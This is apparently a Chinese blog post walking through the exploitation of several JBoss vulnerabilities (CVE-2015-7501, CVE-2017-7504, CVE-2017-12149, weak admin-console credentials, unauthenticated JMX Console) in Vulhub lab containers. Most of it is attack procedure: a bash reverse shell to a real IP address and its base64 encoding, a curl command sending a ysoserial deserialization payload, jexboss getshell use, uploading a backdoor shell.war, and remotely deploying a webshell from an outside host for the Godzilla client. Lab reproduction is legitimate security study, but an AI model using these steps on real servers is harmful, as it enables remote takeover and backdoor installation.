JBOSS中间件漏洞复现

CVE-2015-7501

1.开启环境

cd vulhub/jboss/JMXInvokerServlet-deserialization

docker-compose up -d

docker ps

2.访问靶场

3.访问/invoker/JMXInvokerServlet目录

4.将反弹shell进⾏base64编码
bash -i >& /dev/tcp/47.121.191.208/6666 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTkxLjIwOC82NjY2IDA+JjE=
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTkxLjIwOC82NjY2IDA+JjE=

使用ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

curl 47.121.191.208:8080/invoker/JMXInvokerServlet --data-binary @exp.ser 

5.监听6666端口

反弹成功

CVE-2017-7504

1.开启环境

cd vulhub/jboss/CVE-2017-7504

docker-compose up -d

2.访问靶场

3.访问漏洞地址

/jbossmq-httpil/HTTPServerILServlet

4.使用python3 jexboss.py -u http://47.121.191.208:8080进行getshell

CVE-2017-12149 

1.开启环境

cd vulhub/jboss/CVE-2017-12149

docker-compose up -d

2.访问靶场

3.验证漏洞是否存在

访问此/invoker/readonly目录

返回500,说明存在漏洞

4.使用工具检测,执行命令

 Administration Console弱⼝令

1.开启环境

cd vulhub-master/jboss/CVE-2017-12149

docker-compose up -d

依旧是此环境

2.首先访问密码文件

密码文件

/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties

账户密码:admin:vulhub

3.访问/admin-console/login.seam目录

使用上面的用户名密码进行登录

4.点击web应⽤,上传后⻔ shell.war

5.访问此文件

/shell/shell.jsp

6.测试连接

高版本JMX Console未授权 

1.依旧是12149的环境

2.访问/jmx-console/目录

用户名:admin

密码:vulhub

3.在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer

4.进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署

5.输⼊Invoke

http://47.121.191.208/zxin.war

6.访问zxin.jsp

/zxin/zxin.jsp

7.使用哥斯拉进行测试连接

低版本JMX Console未授权 

1.开启环境

cd vulhub-master/jboss/CVE-2017-7504

docker-compose up -d

2.访问靶场

3.访问/jmx-console目录

登录

admin admin

4.然后找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)

5.使用哥斯拉进行测试连接

上一篇:隧道面稳定性分析MATLAB


下一篇:git学习报告